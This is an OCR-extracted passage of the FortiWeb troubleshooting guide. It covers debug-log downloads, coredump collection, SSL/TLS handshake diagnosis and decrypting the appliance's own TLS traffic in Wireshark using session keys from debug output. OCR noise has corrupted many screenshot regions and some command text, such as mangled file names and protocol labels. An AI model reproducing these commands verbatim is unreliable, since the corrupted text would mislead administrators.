SNMP @ Debug I
Replacement Message €@ reCAPTCHA ‘
Advanced
FortiGuard
FortiSandbox

Feature Visibility

m"®m FortiWeb-400E FortiWeb

-nw
£+ System v =

Status >  [ifDownload

Network > DebugLog

Config >

High Availability >

Admin y [ UPload

. . Debug Symbol File =~ €@ Upload
Backup & Restore
Firmware
System Time
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¥ GA\Downloads\console_log (5).tar.gz\console_log (5).tar\var\log\debug\http_download_logh,

Name Size  Packed Size Modified Maode User
J 100 512 2021-09-28.. -rW-r--r--  root
[ ] netstat 0 0 2021-09-28.. -rW-r--r--  root
|| kernel 1728 095 1728512 2021-09-28.. -rw-r--r-- root
| |jeprof.out.11164.1632789019.heap 109 251 109 568 2021-09-28.. -fW-r--r-- root
| | FortiWeb_210928_1728.nmon 30714 30720 2021-09-28.. -rw-r--r-- root
| | FortiWeb_210927_1728.nmon 428 994 429056 2021-09-28... -rw-r--r-- root
| | FortiWeb_210926_1728.nmon 428 362 428 544 2021-09-28... -rw-r--r-- root
|| FortiWeb_210925_1727.nmon 428 371 428 544 2021-09-28... -rw-r--r-- root
|=| debug_memaory.txt 2109 009 2109440 2021-09-28... -rw-r--r-- root
|=| debug_disk.trt 16703984 16704 000 2021-09-28.. -rw-r--r-- root
| | daemon 1840 584 1840 640 2021-09-28.. -rw-r--r-- root
| ] crash 0 0 2021-09-28.. -W-r--r-- root
[Gz]coredump-2021-08-29-05_51.gz 281774239 281774592 2021-09-28.. -TW------- root
[Bz]coredump-2021-01-08-05_55.9z 289008 348 289008 640 2021-09-28.. -TW------- root
|| coredump 0 0 2021-09-28.. -rW-r--r-- root
[&z] core-2021-01-08-05_55.gz 14 164 14336 2021-09-28.. -rw-r--r-- root

3. You can run diagnose debug commands to customize logs included in the archive debug file.
For example, you can capture the flow from the client 216.232.182.247 and activate the debug flow from
it as below. Then you'll find that the following files will be included in the downloaded debug file console_

log.tar.gz:
« sn.txt: SN & current build
« entire configuration file
« crashlogs

« daemon logs: the debug flow trace logs is included in this file

« kernellogs

« netstatlogs

« coredump logs

« perflogs

« toplogs

« nmon logs: regular record

« jeprof.out.*.*.heap: need to enable jemalloc-conf and trigger jemalloc dump first

« debug_net/disk/mem/process.txt or debug_out_d_mem/net/proc/cond.sh.txt: regular record

« collect_xxx: captured pcap file (diagnose CLI filtered output) and other debug information

« otherlogs

FortiWeb # diagnose debug trace tcpdump filter "host 216.232.182.247 and port

443"

FortiWeb # diagnose debug flow filter client-ip "216.232.182.247"

FortiWeb # diagnose debug flow filter flow-detail 7
FortiWeb # diagnose debug trace report

FortiWeb # diagnose debug trace report start

Then wait to collect traffic..

FortiWeb # diagnose debug trace report stop

Then you can click the “Download” button on System > Maintenance > Debug >

Download to download the archive file:
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¥ | GA\Downloads\console_log (10).tar.gz\console_log (10).tar\var\log\debug\http_download_log\,

74

Name Size
[ ] FWB-AWS-M01_210823_2202.nmon 479 609
[] FWB-AWS-M01_210822_2202.nmon 480 777
[] FWB-AWS-M01_210821_2202.nmon 478 627
[] FWB-AWS-M01_210820_2202.nmon 479 665
[ ] FWB-AWS-M01_210820_0055.nmon 447 644
|j debug_out_d_proc.sh.txt 73627
E| debug_out_d_net.sh.txt 58722
|j debug_out_d_mem.sh.tut 83 481
|j debug_out_d_cond_cpu.sh.txt 58 464
|j debug_memory.tut 118772
E| debug_disk txt 6194 083
912 499
|j crash 1]
|j coredump 1]
| | collect_top 6159
o collect_tcpdump.pcap 7001
[ 7 collect_perf 8192
[ 7 collect_other 4224
collect_fwb_system.conf.zip 7634 830

Packed Size
479744
481 280
478720
479744
448 000

73728
58 880

83 968
58 880
118784
6194 176
912 896
0

0

6 656
7168
8192
4608
7634944

Modified

2021-10-04...
2021-10-04...
2021-10-04...
2021-10-04...
2021-10-04...
2021-10-04...
2021-10-04...
2021-10-04...
2021-10-04...
2021-10-04...
2021-10-04...
2021-10-04...
2021-10-04...
2021-10-04...
2021-10-04...
2021-10-04...
2021-10-04...
2021-10-04...
2021-10-04...

Mode User Grot
-rw-r--r-- root 0
-rw-r--r-- root 0
-rw-r--r-- root 0
-rw-r--r-- root 0
-rw-r--r-- root 0
-rw-r--r-- root 0
-rw-r--r-- root 0
-rw-r--r-- root 0
-rw-r--r-- root 0
-rw-r--r-- root 0
-rw-r--r-- root 0
-rw-r--r-- root 0
-rw-r--r-- root 0
-rw-r--r-- root 0
-rw-r--r-- root 0
-rw-r--r-- root 0
-rw-r--r-- root 0
-rw-r--r-- root 0
-rw-r--r-- root 0

Note: To access this part of the web Ul, your administrator’'s account must have the prof_admin

permission. For details, see "Permissions" in FortiWeb Administration Guide.

Diagnose Crash & Coredump issues

« Common troubleshooting steps on page 74

« Checking core files and basic coredump information on page 75

« Collecting core/coredump files and logs on page 76

« What to do when coredump files are truncated or damaged on page 80

Common troubleshooting steps

When you find an unexpected system reboot or intermittent connection interrupt, the system may encounter a
daemon or kernel crash. At this time the most important thing is to collect core/coredump files and system logs,

then provide them to R&D for further analysis immediately.
Common checking & analyzing steps:

« Check if daemon or kernel coredump files are generated
« Check the basic coredump information
« Download core & coredump files

« Collect & download system logs (Listed in Customizing&downloading debug logs on page 70, including

dmesg & other debugs logs)
« Possible temporary workaround/solution:

« Restore the latest configuration or remove newly-added configuration

FortiWeb Trouble-shooting Guide
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« Move away newly migrated traffic if there is

« Submit bugs and provide information collected for further analysis

Checking core files and basic coredump information

When you suspect that a system or daemon crash happened, one can use diagnose commands to confirm and
check the basic information.

1.

FortiWeb Trouble-shooting Guide

Confirm that enable-debug-1og is enabled, so that FortiWeb will record crash, daemon, kernel, netstat,
and core dump logs.
FortiWeb# show full-configuration sys settings
config system settings
set enable-debug-log enable #enabled by default
end

Use “diagnose debug crashlog show”to check if any coredump files are generated.
FortiWeb# diagnose debug <xxxlog> show
xxx log: coredumplog, crashlog, daemonlog, emerglog, kernlog, netstatlog

FortiWeb# diagnose debug crashlog show
core-proxyd-2141-1630609770
core-proxyd-7794-1630610047
core-proxyd-60152-1630609579

You can also check if new core* or coredump* files are available in System > Maintenance > Backup &
Restore > GUI File Download/Upload.

Use “diagnose debug coredumplog show”to show basic stack information.
FortiWeb# diagnose debug coredumplog show

======== coredump about /var/log/gui upload/core-proxyd-4830-1639993541 =======
(gdb) 0 0x0000563f7b340e24 in pth comm add pb adom entry ()

1 0x0000563£f7b48584c in session management get weight ()

0000002 0x0000563f7b4b23b2 in ip intelligence session _init do action ()
3 0x0000563£f7b4b262d in ip intelligence session init ()
0x0000563£f7b3343ff in pth init modinfo ()

0x0000563£f7b310797 in pt service http init ()

0x0000563£f7b30959¢c in pt service init ()

0x0000563£f7b3837bb in pt stream create service ()

0x0000563£f7p3842f1 in pt stream create ()

9 0x0000563f7b38a3d4 in session_accept ()

10 0x0000563f7b350cba in fd epoll poll ()

11 0x0000563f7b39622d in worker loop ()

0000012 0x0000563£7b3965£f8 in worker run ()

@ J o U1 B>

13 0x00007fa62d314f27 in start thread () from /fwdev2//lib/libpthread.so.0
14 0x00007fa6269ff1df in clone () from /fwdev2//lib/libc.so.6
(gdb)

From above information from bug #770008, it seems the coredump is related to client management
configuration, so one workaround applied at that time was disable the block settings in client management

Note:
Note:

1. Kernel coredump files cannot be shown by “diagnose debug crashlog show”or“diagnose
debug coredumplog show”on 7.0.1 and previous versions.

You need to check if there are files named as “core-xx” & “coredump-xx” under System > Maintenance >
Backup & Restore > GUI File Download/Upload.

/var/log/gui_upload# ls -1

75
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-rw-r--r-- 1 root root 257583 Sep 28 02:50 core-2021-05-11-22 38
-rw-r--r-- 1 root root 670162944 Sep 28 02:50 coredump-2021-05-11-22 38

If yes, please refer to the section below to download them for further analysis.
2. The format of core files are defined by:

/# more /proc/sys/kernel/core pattern
/var/log/gui upload/core-%e-%p-5%t

%e: daemon/process name

%p: PID of the process

%t: UNIX timestamp; one can use online tools to convert it to a human-readable date. This is useful to
confirm the recent & current coredump files if there are many files. (Of course, you can also check the file
created time from “Last Modified Time” via System > Maintenance > Backup & Restore > GUI File
Download/Upload)

E.g.:
Epoch Converter - Unix Timestamp Converter

@ EpochConverter

Epoch & Unix Timestamp Conversion Tools

The current Unix epoch time is 1637782895

Convert epoch to human-readable date and vice versa

1630609770 Timestamp to Human date | [batch convert]

Supports Unix timestamps in seconds, milliseconds, microseconds and nanoseconds.

Assuming that this timestamp is in seconds:

MT : Thursday, September 2, 2021 7:09:30 PM
our time zone : Thursday, September 2, 2021 12:09:30 PM GMT-07:00 DST
Relative : 3 months ago

Actually you have another way to simply check the file generation date from GUI; just check the section below to
find "Download core/coredump files".

Collecting core/coredump files and logs

As stated in above section, core/coredump files formatted as core-* and coredump-* can be downloaded from
System > Maintenance > Backup & Restore > GUI File Download/Upload.

It's also necessary to collect some other logs that can help to analyze the coredump causes.

FortiWeb Trouble-shooting Guide Fortinet Technologies, Inc.


https://www.epochconverter.com/

Diagnosing system issues 7

Please collect these logs:

1. Download the archived debug log with one-click button (System > Maintenance > Debug > Download).
The archive file includes most logs under /var/log/debug/, /var/log/gui_upload and some other system
directories.

Please remember that you have to enable System > Config > Feature Visibility > Debug at first.
="2 FortiWebVM Fortiweb

& Global v

& Dashboard » — Download

& Network > | Joebuzios ]

£ System w

Administrative Domains H X
' Upload

Conhg »

High Awzilability » . Debug Sygbal File | & Upload

Admin

Maintenance

Backup & Restore
Firmwvare
System Time
Debug

%% Security Fabric

& User

bl |oghReport

(=]

@ consale_logtargz -
] 9

2. Download core/coredump files and other logs that are not archived in the debug log.
Core and coredump files are usually very big, so they are not included in the one-click debug log file.

Some other bugs such as complete dmesg logs and ha_event_log are not included at earlier builds
especially when they’re added by new features, so it's better for you to check the one-click downloaded
debug file and see which logs are not included.

For these logs, you can download via System > Maintenance > Backup & Restore > GUI File
Download/Upload:
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System Configuration (Last Backup: Wed Apr & 12:12°47 2022
¥ network Badkup/Restore
. = -
Backup JEEST
Adminestrative in
nfig Back up entire configuration JESICETERNE LT 5T B eb i fi e figurat
. nchude Machine Learning Data OB
I Y £l
r b |
Admin

G File Download Upload

I debug - d_memsh b 2022
lebug out_d 1.t MEB
det t.dr h.t Fi MB
Jel t_d_cond_cpi i Apr 4:26:4 0 KB
deb t.d_p h.t d pr & i
debug out d mem.ch.bd old hu Apr 2808:41:42 2022 2501 MB

Accordingly, these logs are stored at the following directories. Sometimes the support team may also
require you to copy other log files to /var/log/gui_upload, then you can download them from GUI.

/var/log/gui upload/core-*
/var/log/gui upload/coredump-*
/var/log/dmesg/ : #You can archive this directory first by executing “tar czf /var/log/gui_
upload/dmesg.tar.gz /var/log/dmesg/”
ha event log: including very detailed HA init, switch, config-sync, heartbeat logs
Note: After 7.0.1 release, /var/log/dmesg/* & ha_event_log are already included in the archived debug log,
so you do not need to download them separately.

3. Download core/coredump files (named as core-* and coredump-*), detailed dmesg logs, and other logs
(not archived in the debug log, but can be seen directly in GUI File Download/Upload).
It's better to check the files in the one-click downloaded debug file to see which logs are not included, then
just download them to avoid duplicate download.

/var/log/gui upload/core-*
/var/log/gui upload/coredump-*

/var/log/dmesg/ : #You can archive this directory first by executing “tar czf
/var/log/gui upload/dmesg.tar.gz /var/log/dmesg/”

ha event log: including very detailed HA init, switch, config-sync, heartbeat logs
4. Download Event logs from Log&Report > Log Access > Download, selecting the corresponding time
period;
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FortiWeb-VM VM_01

79

Log Download

NA Security Fabric >
>
& User Log Type ISV AT Attack Log  Traffic Log
& Policy > ||| SystemTime | Sat Jan 800:32:51 2022 Refresh
& Server Objects > Start Time  Year « Month | 12 w Day
¢ Application Delivery > Hour « Minute | 0 ~ Second
& Web Protection > End Time Year » Month | 12 ~ Day
B FTP Security > Hour « Minute | 59 + Second
4 Bot Mitigation >
2 API Protection >
:
U DoS Protection >
) G\Downloads\elog_download_log.tar.gz\elog_download_log.tar\ — O X
B |P Protection > ,
File Edit View Favorites Tools Help
0 Tracking > dh wm o wp wp ¥ i
= Machine Learning N Add Extract Test Copy Move Delete Info
53 G\Downloads\elog_download_log.tar.gz\elog_download_log.tar\ ~
@, Web Vulnerability Scan > ‘
Na!'r)ﬁ ____________________ Size  Packed Size Modified Mode User Group Symbolic Li..|
Ll Log&Report v Efievent_download.log | 184 810 184832 2022-01-07 23:38 -rw-r--r— root 0
Log Access v
Attack
Event
Traffic
Note:

a. In6.4.0, core and coredump files will be achieved and put a copy into /var/log/debug/tmp when one
clicks to download the debug log (System > Maintenance > Debug > Download Log),

b. In6.4.1,7.0.0 and later releases, all kernel core and coredump files will not be achieved and can be
only downloaded from /var/log/gui_upload. Please refer to the screenshot below, one can also
compress a specific file before download it:

225 FortiWebVM VM.O1

@ Dashboard > * || Backup & Restore FTP Backup

b Network

Local Backup & Restore

[e ]
[e ]

QYL ERTENIN  Back up CLI configuration  Back up Web Protection Profile related configuration

e Include Machine Learning Data
Firewall > Encryption
cate :
High Availability >
Admin >
Maintenance 2
GUI File Download/Upload
Backup & Restore
Firmware Clear All
System Time
Partition
Debug
X4 Security Fabric N debug_out_d_cond_cpu.sh.txt
& User s || debug out_d procsh.txt
B Policy > debug_out_d_mem.sh.txt
=5 Server Objects > || debug disk.txt
*€ Application Delivery > debug_out_d_net.sh.txt
& Web Protection > | debug_ out_d_procsh.txt.gz
8 FTP Security > debug_out_d_cond_cpu.sh.txt.gz
% Bot Mitigation > | | debug_disk.t.gz
2 API Protection > | perfdata
I N N
n perfdata.old

Last Modify Time
Mon Nov 15 22:05:03 2021
Mon Nov 15 22:05:03 2021
Mon Nov 15 22:05:03 2021
Mon Nov 15 22:05:03 2021
Mon Nov 15 22:05:03 2021
Mon Nov 15 19:34:12 2021
Mon Nov 15 19:33:59 2021
Mon Nov 15 19:33:27 2021
Sat Nov 1309:25:06 2021

FriNov 12 14:05:29 2021

Size
899.008
18.03KB
418.98KB
21.01KB
394.69 KB
31.54KB
30.13KB
125.11KB
17.71MB
1774 MB

Delete

B e e 8 0 8 &

3

Compress Download

&

%
fe ke Be ke Be e

e e

oM % %% %% % %

te

5. Provide core/coredump files, dmesg and other necessary logs to the support team for further investigation.

Usually you only needs to collect core/coredump, dmesg and other logs and provide them to support team for

further analysis.
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What to do when coredump files are truncated or damaged

Sometimes you may find the size of a coredump file is 0, or obvious truncated stack information from the
coredump file. It might mean the coredump file is truncated or damaged. To provide enough information to
locate the root cause of a system/daemon crash, it's necessary to resolve the problem and generate a complete
coredump file.

1. Check if disk space (especially /var/log) is enough for generating/storing a coredump file:

/# df -h

Filesystem Size Used Available Use% Mounted on
/dev/root 472 .5M 335.7M 136.8M 71% /

none 1.1G 116.0K 1.1G 0% /tmp

none 3.8G 2.5M 3.8G 0% /dev/shm
/dev/sdbl 362.4M 213.7M 129.1M 62% /data
/dev/sdb3 90.6M 56.0K 85.6M 0% /home
/dev/sdal 439.1G 7.5G 409.3G 2% /var/log

2. Check if the size of coredump file generated is very large - in older versions there is a limit of 50G for proxyd
core files.

3. Check if there is any file system issue:

FortiWeb# execute fscklogdisk
This operation will fsck logdisk !
Do you want to continue? (y/n)y

fsck logdisk..
FortiWeb#

4.Setenable-core-file to generate a complete coredump:

By default, if the coredump file is very large (usually with a FortiWeb box with large memory size), the time
used to generate the core file and write to disk might be very long (several minutes to more than 10 minutes).
The negative impact is that a reboot will be triggered if the dump cannot be completed in 120s, and the daemon
will not respond to new requests during this period.

However, coredump mechanism is usually very essential for further diagnosing a critical issue because it
records important information in memory and CPU registers when the issue happens.

On FortiWeb 6.3.15 and later releases, a new option enable-best-effort forset enable-core-file
is added. When this option is set, “hung task timeout” will not take effect. That is to say, we can always
expect the system to generate a complete coredump file. This option is useful to analyze a tough issue, though it
may cause the service to stop responding for a long time. Also, in 6.3.15 and later releases, the 50G core size
limit has been removed.

FortiWeb# config server-policy setting

FortiWeb (setting) # set enable-core-file #only works for proxyd

disable Disable coredump for proxyd.

enable Enable coredump action for proxyd, stop if coredump cannot finish in
hung task timeout seconds.

enable-best-effort Enable coredump action for proxyd, stop until the entire core

file is generated.
5. Other configurable behavior:

You can set the maximum daemon coredump files that can be stored to disk. If more core files are generated,
the oldest one will be removed.

FortiWeb (setting) # set core-file-count
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3 3
5 5

Note: This command only works for daemon coredump file. For kernel core and core dump files, the limitation
is fixed as: only 1 coredump files; up to 5 core files.
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Server policy

« Why don't my back-end servers receive the virtual server IP address as the source IP?
« Does an FTP server policy handle FTP, FTPS and SFTP traffic?
« Why does blocking by XFF not work when private IP in XFF?

FAQ

Why don't my back-end servers receive the virtual server IP address as the
source IP?

When the operation mode is Reverse Proxy, the server pool members receive the IP address of the FortiWeb
interface the connection uses. If the back-end servers need to know the IP address of the client where the
request originated, configure a X-Forwarded-For rule for the appropriate profile. For details, see "Defining your
proxies, clients, & X-headers" in FortiWWeb Administration Guide.
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Does an FTP server policy handle FTP, FTPS and SFTP traffic?

Until you configure an FTP server policy, FortiWeb will deny all FTP traffic.
You can configure an FTP server policy to handle FTP and FTPS traffic, but SFTP is not supported.

FTPS (also named as FTP-over-SSL) is based on SSL/TLS and actually requires a backend FTP server for the
communication. SFTP (SSH File Transfer Protocol) is just a part of SSH. It's more like a file transfer client
instead of a server service.

Why does blocking by XFF not work when private IP in XFF?

By default, XFF parsing will ignore private IP. If you do not want to ignore it, please set as follows:

FortiWeb # config waf x-forwarded-for

FortiWeb (x-forwarded-for) # edit test

FortiWeb (test) # set skip-private-original-ip disable
FortiWeb (test) # end

SSL/TLS

o FAQon page 83
« Diagnosing SSL/TLS handshake failures on page 85
« Decrypting SSL packets to analyze traffic issues on page 88

FAQ

How do | detect which cipher suite is used for HTTPS connections?

Use sniffing (packet capture) to capture SSL/ TLS traffic and view the “Server hello” message, which includes
cipher suite information.

For more HTTPS troubleshooting information, see "Supported cipher suites & protocol versions" and "Checking
the SSL/TLS handshake & encryption” in FortiWWeb Administration Guide

How can | strengthen my SSL configuration?

The following configuration changes can make SSL more effective in preventing attacks and can improve your
website's score for third-party testing tools (for example, the SSL server test provided by Qualys SSL Labs).

Which configuration changes you make depends on your environment. For example, some older clients do not
support SHA256.

« For your website certificate, do the following:
« Ifituses the SHA1 hashtag function, replace it with one that uses SHA256.

o Ensure that its key size is 2048-bit.

« Forthe server policy (Reverse Proxy mode) or server pool member configuration (True Transparent Proxy
mode), specify the following values in the advanced SSL settings:
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o Select Add HSTS Header, and then for Max. Age, enter 15552000.
o For Supported SSL Protocols, disable SSL 3.0.

o For SSL/TLS Encryption Level, select High.

« For Enable Perfect Forward Secrecy, select Yes.

« Select Disable Client-Initiated SSL Renegotiation.

For details, see Configuring a server policy on in FortiWeb Administration Guide.

Use the following CLI command to set the Diffie-Hellman key exchange parameters to 2048 or greater:

config system global
set dh-params 2048

The command is available in FortiWeb 5.3.6 and higher releases. For additional information on using CLI
commands, see the FortiWeb CLI Reference:

https://docs.fortinet.com/product/fortiweb/

Why can’t a browser connect securely to my back-end server?

If a browser cannot communicate with a back-end server using SSL or TLS, use the following troubleshooting
steps to resolve the problem:

1. Without connecting via FortiWeb, ensure that you can access the server using HTTPS.

2. Ensure that your browser supports HTTP Strict Transport Security (HSTS). For example, following web page
provides compatibility tables for various web browser versions:

http://caniuse.com/stricttransportsecurity
3. Ensure that the FortiWeb response includes the strict transport security header.

To add this header, select Add HSTS Header in the server policy or server pool configuration. For details, see
"Configuring a server policy” or "Creating a server pool" in FortiWeb Administration Guide.

4. Use the following to ensure that the server certificate is trusted:
« Ifthe certificate is signed by intermediate certificate authority (CA), the intermediate CA is signed by a root
CA.

« Theroot CAis listed in your browser’s store of trusted certificates.
« The domain name or IP address is consistent with the certificate subject.

For details, see "Uploading a server certificate" in FortiWeb Administration Guide.

How to backup & restore private keys

« Refer to Admin Guide > How to set up your FortiWeb > Secure connections > How to export/backup
certificates & private keys.
« Local certificates are stored at: /data/etc/cert/local/root

/data/etc/cert/local/root# 1ls
FortiWeb CA.cer server 2048.cer server 4096.cer
FortiWeb CA.key server 2048.key server 4096.key

Keys are encrypted. During the encryption process, we will convert the key file into a matrix system and perform
matrix conversion and hashing algorithms to protect each key file.
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Diagnosing SSL/TLS handshake failures

If the client is attempting to make an HTTPS connection, but the attempt fails after the TCP connection has been
initiated, during negotiation, the problem may be with SSL/TLS.

1. Check the errors displayed on SSL/TLS client/browser.

A SSL/TLS client or browser usually displays the SSL error code it encountered. Once can check and try to
resolve them based on the specific error message.

Common symptoms may include error messages such as:
« ssl_error_no_cypher_overlap (Mozilla Firefox 9.0.1)

o Error 113 (net::ERROR_SSL_VERSION_OR_CIPHER_MISMATCH): Unknown error (Google
Chrome 16.0.912.75 m)

You can search on Internet to find solutions for those common error messages and check if any
problem is caused by client sides:

How to Fix SSL Error on Firefox Browser? - A Complete List (comparecheapssl.com)
However, we can often check SSL error codes on FortiWeb attack logs as below.
2. Check detailed SSL errors in attack logs.
SSL errors will be displayed in attack logs once “Ignore SSL Erros” is disabled by either method as below:
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« Disable Ignore SSL Errors in Log&Report > Log Config > Other Log Settings
- .
m = FortiWeb-AWS FWB-AWS-MO1

XX Security Fabric > *| Other Log Settings
i FortiView >
Enable Attack Lo O
& User > &
Enable Traffic Log O
B Policy >
Enable Traffic Packet Log @O
= Server Objects >
Enable Event Log O
Application Deli >
*# Application Delivery lgnore SSL Errors »
& Web Protection >
B FTP Security > & Retain Packet Payload For
% Bot Mitigation ? Parameter Rule Violation | @
+ API Protection > Hidden Fields Violation ©
U DoS Protection > HTTP Protocol Constraints (@)
¥ |P Protection > Signature Detection | @)
O Tracking > Custom Signature Detection @O
= Machine Learning > Anti Virus Detection O
@, Web Vulnerability Scan > Custom Access Violation ©
il Log&Report > CORS Protection O
miEes ) IP Reputation Violation ©
P N lllegal File Type O
Cookie Securit
Log Policy > Y ©
Padding Oracle Attack O
Log Config v
FortiSandbox Detection O
Global Log Settings ]
JS0N Protection O
Other Log Settin
gl File ize o
Sensitive Data Logging Web Shell Detection O

» Check detailed SSL errors in attack logs through:

conf log attack-log
set no-ssl-error disable
end

Forinstance, a log is like below:
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"SSL Error(394) - dh key too small".
This error means the length of dh pukkey in the ssl "server key exchange" is short, that is to say, it's too
weak and insecure, and the higher version will consider closing it.

Please check the error code/message listed:
SSL/TLS error messages (fortinet.com)
https://mantis.fortinet.com/file_download.php?file_id=666300&type=bug

3. If SSL erroris related to protocol or cipher suite, you can use OpenSSL to confirm which protocol & ciphers
are supported:

« Check whether the backend server or FortiWeb supports strong (HIGH) encryption:
openssl s client -connect example.com:443 -cipher HIGH
« Check whether the backend server or FortiWeb supports old versions such as SSL 1.1:
openssl s client -tlsl.l -connect example.com:443
If you have checked the errors but are not sure about the cause, please collect diagnose logs and also
capture packets at the same time, then send to developers for further investigation:

4. Diagnose debug flow can output error during SSL handshake:
diagnose debug reset
diagnose debug enable
diagnose debug timestamp enable
diagnose debug flow filter flow-detail 7
diagnose debug flow filter server-ip 192.168.12.12 #The VIP in RP mode or the
real server IP in TP/TI mode
diagnose debug flow filter client-ip 192.168.12.1
diagnose debug flow trace start
diagnose debug flow trace stop

FortiWeb # <04:05:24>[work 0] [flow] policy SP_01 create service:0x7fae5dl4ce28

<04:05:24>[work 0] [flow] ssn 1120 policy SP 01 strm O dir 0O subclient 0 create
http substream:0x7fae5d195328

<04:05:24>[work 0] [flow] ssn 1120 policy SP 01 strm 0 dir 0 subclient 0 create
stream:0x7fae5e05d908

<04:05:24>[work O] [flow] ssn 1120 policy SP_01 strm O dir O subclient 0 session
accept (104.40.29.86:46226->10.0.0.108:443), £fd:27, clissl 0x7fae8568bf88,
session count 1 session:0x7fae5e036a98

<04:05:24>[work 0] [flow] ssn 1120 policy SP 01 strm 0 dir 0 subclient 0 client 27
[ST-ssl-handshake], conn st 0x00000004

<04:05:24>[conn lib]ssl handshake failed

<04:05:24>[work 0] [flow] ssn 1120 policy SP 01 strm O dir 0 subclient 0 ssl
handshake failed for client 27

<04:05:24>[work O] [flow] ssn 1120 policy SP 01 strm O dir O subclient 0 client 27
conn st 0x00000004, conn set err, err msg:err ssl handshake

For real-time debugging, besides logging the diagnose outputs, it's better to also capture application traffic

packets at the same time like below.

5. Capture packets and check the handshake.
Usually one can create two filter tasks in System > Network > Packet Capture to capture packets from a
specific client and to a specific backend server in server-pool simultaneously.

<« C A Notsecure | https//10.159.37.1/root/network/packet-capture a v @ :

= .= FortiWeb-VM VM_01

@ Dashboard > |+ CreateNew & @ Clear All Files

|+ Network v
# Interface v Filter o N
Interface from client to vip

2 portl host 172.30.213.28 and tcp and port 8002 35 4000 |
5 portl host 10.159.37.11 113 4000 E c&
from waf to real servers

Packets Maximum Packet Count Progress

Virtual IP
Route

DNS

Packet Capture
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After the pcap files are downloaded, one can open them with Wireshark to check the TCP and SSL
negotiation details. You can check statistics conversations, follow a TCP/TLS stream, or add filters such as
“ip.addr==172.30.213.28 && tcp.port==23222 && ip.addr==10.159.37.1 && tcp.port==8002" to narrow
down traffic flow to a specific stream.

Decrypting SSL packets to analyze traffic issues

If SSL/TLS handshakes are successful but there are still server-policy access failures, sometimes we may need
to decrypt the SSL packets and check more details in HTTP packets.

In brief, we need to capture packets on FortiWeb and enable diagnose debug flow at the same time; after
retrieving the SSL keys from diagnose output, use it in wireshark to decrypt the SSL traffic, then you'll be able to
see the encrypted HTTP communication. As the keys used for TLS1.3 are different with TLS1.2 and before, we
describe them separately as below.

Decrypting TLS 1.2/1.1/1.0 Traffic

1. Capture packets on FortiWeb, and enable diagnose debug flow at the same time as follows.
FortiWeb# diagnose debug flow filter flow-detail 4
FortiWeb# diagnose debug flow trace start
FortiWeb# diagnose debug enable

Please note:
« Add filters when capturing packets on FortiWeb;

« Do not add filters in diagnose commands as below if the back-end server provides SSL/TLS service,
otherwise SSL keys cannot be displayed in diagnose output. It's a known limitation while we’ll enhance
it in future builds.

« If you only wants to decrypt SSL traffic from clients to FortiWeb, below filters can be added

diagnose debug flow filter client-ip 172.30.214.11
diagnose debug flow filter server-ip 10.159.37.33

2. The clientrandom and "pre master key" will be in the diagnose debug output as follows.
You can find the client random and "pre master key" in two sections in diagnose output. Either of them can
be retrieved and used as keys to encrypt SSL traffic in wireshark.

Section I:

tlsl.3 ssl key (server):

CLIENT RANDOM 6le7b3d0b841lad4abd371199cd32e23b6ee89f405c7aabc2a28997964ed01a677
e392e420f25bfb69cfae878c05c098dcea21020de21e1852¢c44701edfb25a28677a4b3677c3a
a054352643bcadl71a70

tlsl.3 ssl key (client):

CLIENT RANDOM bcacl8831f2c2b63d8ea784ba5df74bc8e0el618£3c7bb927bcdaSbbecdba322a
cebb2af2b4bb2fed087214da294dbd8ffbbdbdl62466f76aaab9c822aa73bfec991b6bb7cefb9
c98c3434300afcb32acO

Section IlI: (client random&keys are as same as that in section |)

[work 1] [flow] ssn 1 policy SP 01 strm O dir O subclient 0 client 32 ssl handshake
(172.30.212.177:1074->10.159.37.1:7002) session data: client random
61e7b3d0b841a4abd371199cd32e23bbee89f405c7aabc2a28997964ed01a677, master key
e392e420£f25bfb69cfae878c05c098dcea21020de21e1852¢c44701edfb25a28677a4b3677c3a
a054352643bcadl71a70

[work 1] [flow] ssn 1 policy SP 01 strm O dir 1 subclient 0 server 34 ssl handshake
(10.159.37.1:13536->10.159.37.11:443) session data: client random
bcacl8831£f2c2b63d8ea784babdf74bc8e0el618£f3c7bb927bcdabbbc4ba322a, master key
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cebb2af2b4bb2fed087214da294dbd8ffbbdbdl62466f76aaab9c822aa73bfec991b6b7cefb9
c98c3434300afcb32acO
3. Create a wireshark key file. The key file format is as follows with content retrieved from the diagnose
output.

CLIENT RANDOM 61e7b3d0b841ad4abd371199cd32e23b6ee89f405c7aabc2a28997964ed01a677
e392e420£25bfb69cfae878c05c098dcea21020de21e1852¢c44701edfb25a28677a4b3677c3a
a054352643bcadl71a70

CLIENT RANDOM bcacl8831f2c2b63d8ea784ba5df74bc8e0el618f3c7bb927bcdabbbcdba322a
cebb2af2b4bb2fed087214da294dbd8ffbbdbdl62466f76aaab9c822aa73bfec991b6bb7cefb9
c98c3434300afcb32acO

The first section is for client to FortiWweb and the second is for FortiWeb to back-end server.

You can manually copy and save the client random and "pre master key" to a file, or use a Linux command
to retrieve them as follows:

For releases earlier than 6.3:

awk '{gsub(/\,/," ")}/session data: client random/{print "CLIENT RANDOM " $19 " "
$22}' tlsl2 debug.log > tlsl2key.file

For 6.3 and later:

awk '{gsub(/\,/," ")}/session data: client random/{print "CLIENT RANDOM " $21 " "
$24}' tlsl2 debug.log > tlsl2key.file

You can save the diagnose outputin tls12_debug.log as above and run the command in the FortiWeb
backend shell or a Linux machine.

Sometimes running the command may run into an error:

root@ut:/home/test# awk '{gsub(/\,/," ")}/session data: client random/{print

"CLIENT RANDOM " $21 " " $24}' tlsl.2 flow.log > tlsl.2 key.log

awk: cmd. line:1: warning: regexp escape sequence \,' is not a known regexp
operator

Use below command instead:

awk '{gsub(/,/," ")}/session data: client random/{print "CLIENT RANDOM " $21 " "

$24}1' "tlsl.2 flow.log" > tlsl.2 key.file

4. Setwireshark: edit > preference > protocols > TLS: choose the key file “tIs1.2_key.file” from "(Pre)-Master-
Secret log filename". Then you’ll be able to see that decrypted HTTP traffic.
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4 = ® X € ] C = == !
|.q |A.|3pl‘_.-' a display filter ... <Ctrl-/> ’ '] +
‘ Wireshark - Preferences >
Thrift Transport Layer Security
Tibia
TIME RSA keys list Edit...
TIPC RSA keys list (deprecated) |
TiVoConnect TLS debug file
TLS
TNS | Browse...
Token-Ring Reassemble TLS records spanning multiple TCP segments
TPCP Reassemble TLS Application Data spanning multiple TLS records
TPKT
TPM2.0 [[] Message Authentication Code (MAC), ignore "mac failed"
TPNCP Pre-Shared Key |
TRANSUM (Pre)-Master-Secret log filename
I:ENS |C:\Users\amaDl\Desktop\tlsl.z_key.ﬁle | | Browse... |
TTE
TURMCHANE
TUXEDO
TZSP v
